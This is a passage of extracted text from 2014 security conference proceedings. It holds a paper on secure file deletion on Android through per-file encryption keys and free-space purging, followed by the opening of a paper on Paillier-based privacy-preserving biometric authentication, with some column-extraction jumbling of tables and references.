users all hardware details, such as writing procedures for
flash memory cards.
Additionally, it is a real threat the misuse by intelligence
agencies of data destruction standards as well as embedded
technologies, which can suffer from backdoors or inaccurate
implementations, in an attempt to facilitate unauthorized
access to supposedly deleted data. In fact, there is a need for
practical security technologies that work at the operating
system level, under the control of the user. This technology
has to be easy to use in everyday activities and easily
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
integrated into mobile devices with minimal maintenance
and installation costs.
This paper describes a way to integrate secure deletion
technologies to an encrypted file system in Android
smartphones. This work is part of an effort to build security
technologies into an integrated framework for mobile device
security [1][2].
The remaining parts of the text are organized as follows.
Section II offers background information. Section III
discusses related work. Section IV details the proposed
integration of encrypted file systems and secure deletion
functions. Section V presents a performance evaluation for
the secure deletion function. Section VI discusses
improvements on the proposed approach. Section VII
concludes this text.
II.
BACKGROUND
Traditionally, the importance of secure deletion is well
understood by almost everyone and several real-world
examples can be given on the subject: sensitive mail is
shredded; published government information is selectively
redacted; access to top secret documents ensures all copies
can be destroyed; and blackboards at meeting rooms are
erased after sensitive appointments.
In mobile devices, that metaphor is not easily
implemented. All modern file systems allow users to
“delete” their files. However, on many devices the removefile command misleads the user into thinking that her file has
been permanently removed, when that is not the case. File
deletion is usually implemented by unlinking files, which
only changes file system metadata to indicate that the file is
“deleted”; while the file’s full contents remain available in
physical medium. This simple procedure is called logical or
ordinary deletion.
Unfortunately, despite the fact that deleted data are not
actually destroyed in the device, logical deletion has the
additional drawback that ordinary users are generally unable
to completely remove her files. On the other hand, advanced
users or adversaries can easily recover logically deleted files.
Deleting a file from a storage medium serves two
purposes: (i) it reclaims storage to operating system and (ii)
ensures that any sensitive information contained in the file
becomes inaccessible. The second purpose requires that files
are securely deleted.
Secure data deletion can be defined as the task of
deleting data from a physical medium so that the data is
106
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
irrecoverable. That means its content does not persist on the
storage medium after the secure deletion operation.
Secure deletion enables users to protect the
confidentiality of their data if their device is logically
compromised (e.g., hacked) or stolen. Until recently, the
only user-level deletion solution available for mobile devices
was the factory reset, which deletes all user data on the
device by returning it to its initial state. However, the
assurance or security of such a deletion cannot be taken for
granted, as it is highly dependent on device’s manufacturer.
Also, it is inappropriate for users who wish to selectively
delete data, such as some files, but still retain their address
books, emails and installed applications.
Older technologies [14] claim to securely delete files by
overwriting them with random data. However, due the nature
of log-structured file systems used by most flash cards, this
solution is no more effective than logically deleting the file,
since the new copy invalidates the old one but does not
physically overwrite it. Old secure deletion approaches that
work at the granularity of a file are inadequate for mobile
devices with flash memory cards.
Today, secure deletion is not only useful before
discarding a device. On modern mobile devices, sensitive
data can be compromised at unexpected times by adversaries
capable of obtaining unauthorized access to it. Therefore,
sensitive data should be securely deleted in a timely fashion.
Secure deletion approaches that target sensitive files, in
the few cases where it is appropriate, must also address
usability concerns. A user should be able to reliably mark
their data as sensitive and subject to secure deletion. That is
exactly the case when a file is securely removed from an
encrypted file system.
On the other hand, approaches that securely delete all
logically deleted data, while less efficient, suffer no false
negatives. That is the case for purging techniques.
III.
RELATED WORK
This section briefly describes related work on the subjects
of secure deletion and encrypted file systems on mobile
devices, particularly Android.
The use of cryptography as a mechanism to securely
delete files was first discussed by Boneh and Lipton [6].
Their paper presented a system which enables a user to
remove a file from both file system and backup tapes on
which the file is stored, just by forgetting the key used to
encrypt the file.
Gutman [14] covered methods available to recover erased
data and presented actual solutions to make the recovery
from magnetic media significantly more difficult by an
adversary. In fact, the paper covered only magnetic media
and, to a lesser extent, RAM. Flash memory barely existed
at the time it was written, so it was not considered by him.
Kyoungmoon et al. [12] proposed an efficient secure
deletion scheme for flash memory storage. This solution
resides inside the operating system and close to the memory
card controller.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Diesburg and Wang [16] presented a survey summarizing
and comparing existing methods of providing confidential
storage and deletion of data in personal computing
environments, including flash memory issues.
Wang et al. [19] present a FUSE (File-system in
USErspace) encryption file system to protect both
removable and persistent storage on devices running the
Android platform. They concluded that the encryption
engine was easily portable to any Android device and the
overhead due to encryption is an acceptable trade-off for
achieving the confidentiality requirement.
Reardon et al. [7]-[10] have shown plenty of results
concerning both encrypted file system and secure deletion.
First, Reardon et al. [11] proposes the Data Node Encrypted
File System (DNEFS), which uses on-the-fly encryption and
decryption of file system data nodes to efficiently and
securely delete data on flash memory systems. DNEFS is a
generic modification of existing flash file systems or
controllers that enables secure data deletion. Their
implementation extended a Linux implementation and was
integrated in Android operating system, running on a
Google Nexus One smartphone.
Reardon et al. [7] also propose user-level solutions for
secure deletion in log-structured file systems: purging,
which provides guaranteed time-bounded deletion of all data
previously marked to be deleted, and ballooning, which
continuously reduces the expected time that any piece of
deleted data remains on the medium. The solutions
empower users to ensure the secure deletion of their data
without relying on the manufacturer to provide this
functionality. These solutions were implemented on an
Android smartphone (Nexus One) and experiments have
shown that they neither prohibitively reduce the longevity of
flash memory nor noticeably reduce device's battery
lifetime.
In two recent papers, Reardon et al. [8][9] study the issue
of secure deletion in details. First [9], they identify ways to
classify different approaches to securely deleting data. They
also describe adversaries that differ in their capabilities,
show how secure deletion approaches can be integrated into
systems at different interface layers. Second [8], they survey
the related work in detail and organize existing approaches
in terms of their interfaces to physical media. They further
present taxonomy of adversaries differing in their
capabilities as well as systematization for the characteristics
of secure deletion approaches.
More recently, Reardon et al. [10] presented a general
approach to the design and analysis of secure deletion for
persistent storage that relies on encryption and key
wrapping.
Finally, Skillen and Mannan [4] designed and
implemented a system called Mobiflage that enables
plausibly deniable encryption (PDE) on mobile devices by
hiding encrypted volumes within random data on a device’s
external storage. They also provide [3] two different
implementations for the Android OS to assess the feasibility
107
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
MK
KDF
FSEK
encrypts
encrypts
derives
PBE
FEK | F_ID
FEK | F_ID
...
FEK | F_ID
Encrypted file
Encrypted file system with
single master key.
Encrypted file
Encrypted file system with a
single key per file.
Figure 1. Extending an encrypted file system for secure deletion.
and performance of Mobiflage: One for removable SD cards
and other for internal partition for both apps and user
accessible data.
IV.
DESCRIPTION OF PROPOSED SOLUTION
The rationale behind the proposed solution is the actual
possibility of performing secure deletion of files from
ordinary Android applications, in user mode, without
administrative privileges or operating system customization.
The solution handles two cases according to the place where
the file already deleted or about to be deleted is stored:
1) The file is already kept by encrypted file system;
2) A file or bunch of files was logically deleted by the
operating system and their locations are unknown.
A. Secure Deletion of Encrypted Files
The simplest way to fulfill the task of securely delete a
file from an encrypted file system is to simply lose the
encryption key of that file and then logically remove the file.
This method does not need memory cleaning (purging) and
is very fast. A prototype was built upon an Android port for
the EncFS encrypted file system [18][19]. To accomplish
this task, the way EncFS manages cryptographic keys had to
be modified. EncFS encrypts all files with a single master
key derived from a password based encryption (PBE)
function. It is seams quite obvious that it is not feasible to
change a master key and encrypt the whole file system every
time a single file is deleted. On the other hand, if each file
were encrypted with its own key, then that key could be
easily thrown away, turning the file irrecoverable. The
modification to EncFS consists in the following steps:
a) Use PBE to derive a master key MK;
b) Use a key derivation function (KDF) to derive a file
system encryption key FSEK from MK;
c) Use an ordinary key generation function (e.g., PRNG)
to generate a file encryption key FEK;
d) Encrypt files along with their names using FEK and
encrypts FEK with FSEK and random IV.
e) Keep a mapping mechanism from FEK and IV to
encrypted file (FEK||IV file).
A simple way to keep that mapping is to have a table file
stored in user space as application’s data. Care must be
taken to avoid accidentally or purposely remove that file
when cleaning device’s user space. In Android devices, this
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
can be done by rewriting the default activity responsible for
deleting application’s data. An application-specific delete
activity would provide a selective deletion of application’s
data or deny any deletion at all. The removal from table of
the FEK and IV makes a file irrecoverable. The ordinary
delete operation then return storage space of that file to
operating system. Figure 1 depicts the solution.
Another way to keep track of keys and files is to store the
pair {FEK,IV} inside the encrypted name of the encrypted
file. In this situation, a file has to be renamed before
removed from the encrypted file system. The rename
operation destroys the FEK and makes file irrecoverable.
The ordinary delete operation then return storage space to
operating system.
It is interesting to note that the proposed solution
contributes to solve some known security issues of EncFS
[13][17]. By using distinct keys for every file, a Chosen
Ciphertext Attack (CCA) against the master key is inhibited.
Also, it reduces the impact of IV reuse across encrypted files.
Finally, it eliminates the watermarking vulnerability, because
a single file imported twice to EncFS will be encrypted with
two distinct keys and IVs.
Finally, the key derivation function is based upon
PBKDF2 standard [5], keys and IVs are both 256 bits, and
the table for mapping the pair {key,IVs} to files is kept by an
SQLite scheme accessible only by the application.
B. Secure Deletion of Ordinary Files
In this context, a bunch of files were logically deleted by
the operating system for the benefit of the user, but they left
sensitive garbage in the memory. Traditional solutions of
purging memory cells occupied by those files are innocuous,
because there is no way to know, from user’s point of view,
where purging data will be written.
An instance of this situation occurs when a temporary file
is left behind by an application and manually deleted. This
temporary file may be a decrypted copy of an encrypted file
kept by the encrypted file system. Temporary unencrypted
copies of files are necessary in order to allow other
applications handle specific file types, e.g., images,
documents, and spreadsheets.
Whether temporary files will or will not be imported
back to the encrypted file system, they have to be securely
removed anyway. A premise is that the files to be removed
are not in use by any application. The secure deletion occurs
in three steps:
1) Logically remove targeted files with ordinary deletion;
2) Write a temporary file of randomized content that
occupies all memory’s free space;
3) When there is no free space anymore, logically deletes
that random file. That action purges all free memory in a
way that no sensitive data is left behind.
The final result of this procedure is a flash storage free of
sensitive garbage. Steps two and three can be encapsulated as
a single function, called memory purging, and performed by
an autonomous application. That application would be
activated by the user whenever she needs to clean memory
from sensitive garbage. The proposed solution adopted this
implementation.
108
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Unfortunately, this procedure has two drawbacks. First, it
takes time proportional to the size of the free space to be
cleaned and the speed of memory writes. Second, this
procedure, in the long term, if used with high frequency,
have the potential to shorten the lifetime of flash memories.
In order to minimize the negative impact over memory
life and avoid excessive delays during operation, steps two
and three from above should not be carried out for every
single file deleted from the system.
C. Limitations of the solution
The protection of cryptographic keys is of major
importance. In spite of being stored encrypted, decrypted
just before being used, and then released, the protection of
cryptographic keys relies on Android security and the
application confinement provided by that operating system.
The proposed solution for memory purging is supposed
to work in user-mode, as an ordinary mobile app, without
administrative access, with no need for operating system
modification, and using COTS devices. These decisions have
consequences for security.
First of all, the solution is highly dependent on the way
flash-based file systems and controllers behave. Briefly
speaking, when the flash storage is updated, the file system
writes a new copy of the changed data to a fresh memory
block, remaps file pointers, and then erases the old memory
blocks, if possible, but not certainly. This constrained design
actually enables the alternatives discussed in Section VI.
A second issue is that the solution is not specifically
concerned about the type of physical memory (e.g., internal,
external SD, NAND, and NOR) as long as it behaves like a
flash-based file system. The consequence is that only
software-based attacks are considered and physical attacks
are out of scope.
Finally, the use of random files is not supposed to have
any effect on the purging assurance, but provides a kind of
low-cost camouflage for cryptographic material (e.g., keys or
parameters) accidentally stored on persistent media. An
entropy analysis would not be able to easily distinguish
specific random data as potential security material, because
huge amounts of space would look random. Of course, this
software-based camouflage cannot be the only way to
prevent such attacks, but it adds to a defense in depth
approach to security at almost no cost.
V.
PERFORMANCE EVALUATION OF SECURE DELETION
Table I shows performance measurements for the secure
deletion of ordinary files by purging. The measurements
were taken on two smartphones: (i) LG Prada p940h, with 4
GB of internal storage available and Android 2.3.7; and (ii)
Motorola Atrix with 16GB (only 11 GB available to final
user) of internal storage and Android 2.3.6. File recovery
was performed by PhotoRec recovery tool [15]. Random
files created for purging had size of at most 2 GB.
Tests were performed over internal memory in three
conditions: memory almost free (few files), memory half
occupied (many files), and memory free (no files at all). The
test procedure consisted of the following steps: (a) creation
of ordinary content; (b) logical deletion of that content; (c)
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE I. TESTING SECURE DELETION.
LG Prada p940h
Few files
Many files
Free before purging
~3.9 GB
2.21 GB
3.98 GB
Purging time
4min19s
2min37s
4min24s
Few files
Many files
Free before purging
~10 GB
5,2 GB
10,59 GB
Purging time
18min51s
10min53s
19min22s
Motorola Atrix
No files
No files
execution of secure deletion procedure; and (d) attempting of
content recovery. Tests have shown that secure deletion time
is proportional to memory size and quite similar to recovery
time, as was expected. LG Prada was cleaned at a rate of one
Gigabyte per minute (1 GB/min). Motorola Atrix was
cleaned at a rate of half Gigabyte per minute (0.5 GB/min).
Additionally, a test over a class C SD card of 4 GB was
carried out at 0.25 GB/min. In all cases, PhotoRec was
unable to recover secure deleted files.
VI.
IMPROVEMENTS UNDER DEVELOPMENT
The solution for memory purging is the simplest
implementation of a general policy for purging flash
memories. In fact, a general solution has to offer different
trade-offs among security requirements, memory life, and
system responsiveness. The authors have identified three
points for customization:
1. The period of execution for the purging procedure;
2. The size and quantity of random files;
3. The frequency of files creation/deletion.
By the time of writing, different trade-offs among the
three customization points previously identified were being
implemented and evaluated. In all of them, the random file
created in order to clean memory space is called bubble,
after the metaphor of soap cleaning bubbles over a dirty
surface. These alternatives are discussed in next paragraphs.
A. Static single bubble
The solution described in this text implements the idea of
a single static bubble that increases in size until it reaches the
limit of free space, and then bursts. This solution is adequate
for the cases when memory has to be cleaned in the shortest
period of time, with no interruption. A disadvantage is that
other concurrent application can starve out of memory. This
solution is adequate when nothing else is happening, but the
purging.
B. Moving or sliding (single) bubble
In this alternative, a single bubble periodically moves
itself or slides from one place to another. The moving bubble
has size of a fraction of free space. For example, if bubble
size is 1/n of free space, the moving bubble covers all free
memory after n moves, considering the amount of free space
does not change. A move is simply the rewriting of the
bubble file, since flash memories will perform a rewrite in a
different place.
109
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
In a period of time equals to T*(n/2), where T is the time
between moves, the chance of finding sensitive garbage in
memory is 50%. This solution is adequate when memory has
a low to moderate usage by concurrent applications. This
solution preserves system responsiveness (usability) but
diminishes security.
C. Moving or sliding (multiple) bubbles
This alternative uses more than one bubble instead of a
single one. The size and amount of bubbles are fixed. For
instance, if bubble size is 1/n of free space, two moving
bubble covers all free memory after n/2 moves each. The
advantage of this method is to potentially accelerate memory
coverage, reducing opportunity for memory compromising.
In the example, two bubbles of size 1/n each can move at
every T/2 period, and then concluding in T*n. Alternatively,
they can move at period T and terminate in 2*T*n, and so
on. This solution is adequate when memory has a moderate
usage by concurrent applications. This solution is
probabilistic in the sense that as smaller the duration of T
and greater the size of bubbles, greater the chance of
successfully clean all memory.
D. Sparkling bubbles
This solution varies the size and amount of bubbles. The
idea is to create a bunch of mini bubbles that are sparkled
over free memory. Bubbles are created and instantly
removed at period T, which can be constant or random
between zero and T. The sparking of bubbles stops when the
sum of sizes for all created bubbles surpasses free space.
Bubble size can be small enough to not affect other
applications.
This solution is adequate when memory has a moderate to
high usage by concurrent applications. This solution is
probabilistic in the sense that as smaller the duration of T,
greater the chance of successfully clean the whole memory.
VII. CONCLUDING REMARKS
Technological Development of Telecommunications –
FUNTTEL – of the Brazilian Ministry of Communications,
through Agreement Nr. 01.11. 0028.00 with the Financier of
Studies and Projects - FINEP / MCTI.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
This paper discussed the implementation of two userlevel approaches to perform secure deletion of files. One
works on secure deletion of encrypted files and the other
handles de deletion assurance of ordinary (unencrypted)
files. Secure deletion of encrypted files was fully integrated
to an encrypted file system and is transparent to the user.
Secure deletion of ordinary files was fulfilled by an
autonomous application activated under the discretion of the
user. Preliminary performance measurements have shown
that the approach is feasible and offers a trade-off between
time and deletion assurance. Further tests have to be
performed to fine-tune the solution in order to preserve
system responsiveness. Also, a deep security assessment has
to be performed in order to give the actual extend of the
security provided by the proposed solution.
[18]
ACKNOWLEDGMENT
[19]
The authors acknowledge the financial support given to
this work, under the project "Security Technologies for
Mobile Environments – TSAM", granted by the Fund for
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[13]
[14]
[15]
[16]
[17]
A. M. Braga, E. Nascimento, and L. Palma, “Presenting the Brazilian
Project TSAM – Security Technologies for Mobile Environments”, in
proceeding of the 4th International Conference in Security and
Privacy in Mobile Information and Communication Systems
(MobiSec 2012), LNICST volume 107, 2012, pp. 53-54.
A. M. Braga, “Integrated Technologies for Communication Security
on Mobile Devices”, The Third International Conference on Mobile
Services, Resources, and Users (Mobility’13), 2013, pp. 47-51.
A. Skillen and M. Mannan, “Mobiflage: Deniable Storage Encryption
for Mobile Devices”, IEEE Transactions on Dependable and Secure
Computing, vol.11, no.3, May-June 2014, pp.224,237.
A. Skillen and M. Mannan, “On Implementing Deniable Storage
Encryption for Mobile Devices”, in 20th Annual Network &
Distributed System Security Symposium, February 2013, pp. 24-27.
B. Kaliski, RFC 2898, PKCS #5: Password-Based Cryptography
Specification Version 2.0. Retrieved [July 2014] from
http://tools.ietf.org/html/rfc2898.
D. Boneh and R. J. Lipton, “A Revocable Backup System”, in
USENIX Security, 1996, pp. 91-96.
J. Reardon, C. Marforio, S. Capkun, and D. Basin, “User-level secure
deletion on log-structured file systems”, in Proceedings of the 7th
ACM Symposium on Information, Computer and Communications
Security, 2012, pp. 63-64.
J. Reardon, D. Basin, and S. Capkun, “Sok: Secure data deletion”, in
IEEE Symposium on Security and Privacy, 2013, pp. 301-315.
J. Reardon, D. Basin, and S. Capkun, “On Secure Data Deletion,”
Security & Privacy, IEEE , vol.12, no.3, May-June 2014, pp.37-44.
J. Reardon, H. Ritzdorf, D. Basin, and S. Capkun, “Secure data
deletion from persistent media”, in Proceedings of the 2013 ACM
SIGSAC conference on Computer & communications security (CCS
'13). ACM, New York, NY, USA, 2013, pp. 271-284.
J. Reardon, S. Capkun, and D. Basin, “Data node encrypted file
system: Efficient secure deletion for flash memory”, in USENIX
Security Symposium, 2012, pp. 333-348.
K. Sun, J. Choi, D. Lee, and S.H. Noh, "Models and Design of an
Adaptive Hybrid Scheme for Secure Deletion of Data in Consumer
Electronics," IEEE Transactions on Consumer Electronics, vol.54,
no.1, Feb. 2008, pp.100-104.
M. Riser, “Multiple Vulnerabilities in EncFS”, 2010. Retrieve [july
2014] from: http://archives.neohapsis.com/archives/fulldisclosure/
2010-08/0316.html.
P. Gutmann, "Secure deletion of data from magnetic and solid-state
memory," proceedings of the Sixth USENIX Security Symposium,
San Jose, CA, vol. 14, 1996.
PhotoRec, Digital Picture and File Recovery. Available [July 2014]
from: http://www.cgsecurity.org/wiki/PhotoRec.
S. M. Diesburg and A. I. A. Wang, “A survey of confidential data
storage and deletion methods”, ACM Computing Surveys (CSUR),
v. 43, n.1, p.2, 2010.
T. Hornby, “EncFS Security Audit”. Retrived [July 2014] from:
https://defuse.ca/audits/encfs.htm.
V. Gough, “EncFS Encrypted Filesystem”, stable release 1.7.4
(2010). Available [July 2014] from: http://www.arg0.net/encfs.
Z. Wang, R. Murmuria, and A. Stavrou, “Implementing and
optimizing an encryption filesystem on android”. In IEEE 13th
International Conference on Mobile Data Management (MDM),
2012, pp. 52-62.
110
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Performance Impacts in Database Privacy-Preserving Biometric Authentication
Jana Dittmann, Veit Köppen
Christian Krätzer, Martin Leuckert, Gunter Saake
Claus Vielhauer
Faculty of Computer Science
Otto-von-Guericke University
Email: [jana.dittmann|vkoeppen|
kraetzer|gunter.saake]@ovgu.de
Department of Informatics and Media
Brandenburg University of Applied Sciences
Email: vielhauer@fh-brandenburg.de
Abstract—Nowadays, biometric data are more and more used
within authentication processes. These data are often stored
in databases. However, these data underlie inherent privacy
concerns. Therefore, special attention should be paid for handling
of these data. We propose an extension of a similarity verification
system with the help of the Paillier cryptosystem. In this paper,
we use this system for signal processing in the encrypted domain
for privacy-preserving biometric authentication. We adapt a
biometric authentication system for enhancing privacy. We focus
on performance issues with respect to database response time
for our authentication process. Although encryption implicates
computational effort, we show that only small computational
overhead is required. Furthermore, we evaluate our implementation with respect to performance. However, the concept of
verification of encrypted biometric data comes at the cost of
increased computational effort in contrast to already available
biometric systems. Nevertheless, currently available systems lack
privacy enhancing technologies. Our findings emphasize that a
focus on privacy in the context of user authentication is available.
This solution leads to user-centric applications regarding authentication. As an additional benefit, results using data mining are
more difficult to be obtained in the domain of user tracking.
Index Terms—Database Security, Homomorphic Encryption,
Privacy, Multi-Computer Scenarios, Database Performance
I. M OTIVATION
Biometric data are more and more used in daily life. However, these data underlie privacy concerns by design, because
these data are directly related to individuals. As a result, this
may potentially be misused, e.g., by means of replay attacks,
once accessible by malicious parties. Therefore, biometric data
require protection mechanisms to take advantage of positive
aspects of an authentication scheme. So, privacy-preserving
biometric authentication is a requirement that comes into focus
of databases, which form the core of any biometric system. In
this paper, we present a new approach for user authentication
based on the assumption that encrypted data have to be stored
and at the same time there is no logging information available.
Although data might be deleted from a database, it can be
possible to restore the information partly or even complete.
Grebhahn at al. [1] present an approach for deleting data
in a database whereas at the same time information could
be completely recovered. Although new approaches exist to
cover this information or even to improve the system for
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Behavioral or
Physiological Trait
Behavioral or
Physiological Trait
Data Acquisition
Raw Data
Raw Data
Preprocessing
Raw Feature Data
Raw Feature Data
Feature Extraction
Discrete Feature
Vector
Discrete Feature
Vector
Store Feature Vector
Reference
Storage
Enrollment
Comparison &
Classification
Authentication
Result
Authentication
Figure 1. Enrollment and Authentication Pipeline
secure deletion [2], an overall security of traditional database
management systems with respect to such information leakage
cannot be guaranteed.
In a biometric authentication system, two phases are differentiated [3]. Firstly, a user has to create a specific biometric
template. In practice, these templates are typically stored in a
database. For achieving to store only required information, the
data acquisition (e.g., by using sensors) is followed by a data
preprocessing to filter out noise and non-related information of
the raw data. Note that required information is often depicted
in a feature space. Secondly, a feature extraction is applied
which is followed by a discretion of the feature values. Finally,
the feature vector is stored. This phase is called enrollment.
We show the basic steps in Figure 1 on the left side.
The second phase is called authentication, where a clas-
111
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
sification is required to declare an identity of the biometric
features. We depict this pipeline on the right side of Figure 1.
The first steps from data acquisition to the discrete feature
vector should be applied in the same manners as in the
enrollment phase. Otherwise, it cannot be guaranteed that
the same properties are compared. However, the data for
authentication are not stored. In the comparison step, if a oneto-one matching is performed, we call the authentication verification [3]. Another classification schema is identification,
where a biometric discrete feature vector is compared to a
set of templates from the database. In both schemes, usually a
threshold is used to decide on the success of the authentication.
In case the threshold does not influence the comparison of
templates, the result set of an identification can be the closest match, all, k-nearest, or ǫ-distance-neighbors. With these
result-sets, further analyzes are possible, e.g., data mining or
forensic investigations. Due to complexity, there are several
optimization approaches possible. For instance, it is possible
to use index structures within the database system for an
enhanced data access. However, such index structures need to
be carefully optimized for a multi-dimensional feature space,
see for further details [4]. Another approach is to preserve
privacy in the context of deletion in database index structures
as described in [2].
Data mining enables users to detect patterns that are hidden
in complex data. With the use of computational techniques, it
is also possible to observe and identify relations in the context
of privacy preserving scenarios, see for instance [5], [6], or [7].
The work presented in this paper is based on a master
thesis [8] and summarizes the main results. We present a
methodology based on the Paillier cryptosystem [9] to improve
user preferences with respect to authentication systems. We
present a cross-evaluation of the impact of homomorphic
encryption for biometric authentication using a database within
our evaluation section. The Paillier system is an asymmetric
cryptographic scheme with additive homomorphic properties.
With our new approach, both unique identifiers need to be
decrypted for every message. A disclosure of either the key
is more unlikely, user-tracing becomes less likely, and the pad
do not immediately reveal user content data.
The remainder of this paper is structured as follows: In
Section II, we briefly describe the current state of the art
regarding our new approach. In Section III, we present the
architectural requirements. Our extension of the secure similarity verification is given in Section IV. The evaluation of
our approach regarding performance is part in Section V,
where we show that response times are accompanied with
a small computational effort for privacy preserving aspects.
These findings are in line with theoretical considerations and
assumptions. Finally, we conclude our results and give a short
outlook in Section VI.
II. BACKGROUND AND R ELATED W ORK
In this section, we present related work for preserving
privacy in a biometric authentication context. As important
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
factors, we concentrate on homomorphic encryption as well
as deletion in database systems.
The general security requirements for a biometric authentication system are summarized in [10]. Here, it is shown that
all security aspects [11] become relevant for all enrollment
and verification/identification related components as well as
all data transitions between these. Privacy issues are mainly
related to confidentiality, but require integrity, authenticity,
availability, and non-repudiation of privacy related data. For
each security aspect, a security level can also be introduced,
e.g., ranging from non, low, up to high.
Security plays a vital role due to different scenarios, in
which an attack of personal data is imaginable. A differentiation of attacks can be made on a first level regarding passive or
active attacks. The data stream between sender and recipient is
not influenced in passive attacks. Therefore, only the reading
of data is target for such attacks. Besides just reading data, a
specialization is frequency analysis, where for instance for a
substitution cipher an analysis of letter frequency is used to
identify a mapping. Different extensions are applicable, e.g.,
frequency attacks or domain attacks [12].
Protection mechanisms for such Biometric reference systems exist since more than a decade; prominent examples
are BioHashes [3], Fuzzy Commitment Scheme [13], and
Fuzzy Vault [14]. For an overview on challenges for biometric
template protection and further current protection schemes
see [15]. All these established protection schemes require
data to be compared in an unencrypted form, which leads to
the threat of information leakage as discussed in Section I.
Therefore, these mechanisms are not relevant for the work
presented in this paper.
A. Homomorphic Encryption
Homomorphic encryption is used to perform data operations
on the cipher text which have a corresponding operation on
plain text data. In homomorphic encryption, operations op∗
can be performed on encrypted data that are adequate to
operations op on the plain text. This means that the following
formula holds:
op(x) = decryption (op∗ (encryption (x)) .
(1)
In such a case, the mapping is structure preserving. The
operations op and op∗ depend on the cryptosystem. There
exist additive and multiplicative homomorphic cryptosystems.
Gentry [16] proves the existence of a fully homomorphic
encryption scheme. So, it is possible to perform operations
on data without possessing a decryption key. However, such
systems require high computational effort. In this paper, we
make use of homomorphic encryption to perform operations
for authentication in an encrypted domain.
B. Verification of Homomorphic Encrypted Signals
Rane et al. [17] [18] developed an authentication scheme
with adjustable fault tolerance. This is especially important
for noisy sensor data. Due to error correction and similarity
112
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
verification, Rane’s method can be applied for a wide range
of biometric traits.
In their application, three participants are involved for a
multi-computer scenario. Whereas the first user provides the
biometric signals, the second involved user acts as the central
storage server for all biometric templates. The third user is
responsible for verification. However, this user is seen as
vulnerable and therefore, she is not allowed to query the
database system (DBS).
C. Secure Deletion in Databases
Databases can often reveal more information than intended.
If an entry is deleted from the data collection, it is a mandatory
step to avoid the data reconstruction afterward. Stahlberg et
al. [19] and Grebhahn et al. [1] explain how data can be
reconstructed from metadata or system copies. Furthermore,
DBS specific data, such as index structures, can also be used
for reconstruction of deleted data. This means, even if no
data are left, the system inherent data structure can be used
to gain information from fully deleted data tuples. Therefore,
privacy awareness for database tunings, as described in [2], is
required for biometric DBS to guarantee data privacy, which
is especially challenging for multi-dimensional data [20].
Apart from a possible reconstruction of previously erased
data, saved data can reveal additional information. For instance, the amount of queries for a data tuple can give an idea
about who that tuple belongs to. This kind of vulnerabilities
of the confidentiality needs to be addressed early at the stage
of the database layout. Not all security risks can be solved at
this stage of the design, but a good database layout can indeed
be the foundation of a secure system.
III. A RCHITECTURE FOR P RIVACY-P RESERVING
AUTHENTICATION
In a general authentication setup, there are two instances
that have to share information with each other. There is a
participant using a sensor to authenticate a claimed identity
on the one side. On the other side, there is a reference DBS
containing all enrolled data of all registered users. The DBS
is considered to be semi-trustworthy, which means the data
in this system shall never be available to the database holder
without any kind of restriction or encryption. For that reason,
a system allowing database authentication without revealing
any information to the database holder needs to be applied.
Furthermore, it has to be impossible to decrypt data without
having the secret key. The solution used in this paper to
address this issue is the use of homomorphic encryption.
Here, we use the Paillier crypto system as described in [9].
We slightly extend this scheme with the inclusion of userdefinable key lengths for the purpose of the performance
evaluations presented in Section V.
In Figure 2, we present a simplified pipeline of a verification
process. Note, in this scenario, a compromised DBS administrator could keep track of the order of enrolled employees
and therefore, a sequential ID has to be avoided. This is
also conceivable for timestamps and other metadata. So, it
is inevitable to disable any logging of enrollment steps.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Decision
Biometric
Probe
Authentication
User
Verifier
Authentication
Data
Security
Level
Name
Department
ID
...
Feature
Vector
Encrypted DBS
Figure 2. Authentication Process with Encrypted Database, adapted from [8]
IV. E XTENDING S ECURE S IMILARITY V ERIFICATION
There exist many biometric authentication systems, which
use quite different biometric modalities. Another aspect in this
domain is the quality of systems with respect to accuracy and
security. To some extent, both properties rely on the trait itself.
So, a system that uses only a small set of features with low
quality is expected to have overlapping features for different
users. Due to the fact that systems often have more than
one server and are using different key pairs, user tracking is
not possible. Additionally, the order of users can be mixed
within different systems. We introduce the padded biometrics
approach, which allows user authentications in a multiple
participant scenario with respect to privacy-preservation. Additionally, we present performance impacts and a brief security
impact discussion.
A. The Padded Biometrics Approach
In Figure 3, we depict a scenario for user tracking with
two database systems (DBS). We assume, an attacker has read
access to both databases. The differences between both DBS
are key pairs and user IDs. Assume, with some knowledge, the
attacker identifies in DBS1 User 1. The DBS uses an unsalted
asymmetric encryption which results for a given key and plain
text value always in the same cipher value. Within DBS1 , the
attacker finds the exact same value for another user (User 5).
With the help of this knowledge, both users can be identified in
DBS2 . Due to the fact that the feature vectors are not shuffled,
the attacker needs to identify a match between two users in
DBS2 with an overlap of the same two features.
User 1
DBS 1
User 5
z31:erh9zuds1
z33:965gt4mk0
z39:ggz763ki8
z31:jkas73kl3
z33:hdt3loqy0
z39:gas87gjle
...
...
z85:jaol7qjfw
z86:965gt4mk0
z88:jutgt4qs0
z85:6rtgkiu99
z86:hdt3loqy0
z88:432jjhzx6
User 7
DBS 2
User 14
Figure 3. User Tracking in a Multiple DBS Setup, adapted from [8]
In practice, for a proper biometric trait with an appropriate
resolution this scenario is implausible. As an example, we
113
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
take the iris codes with 2,048 bit representation for the iris
features; there exist theoretically more than 1074 different
codes. However, the Euclidean vector space is very sparsely
populated due to cluster of iris codes. Such clustering occurs
in many biometric modalities. Therefore, our example, given
in Figure 3, is a result from exact matches for different feature
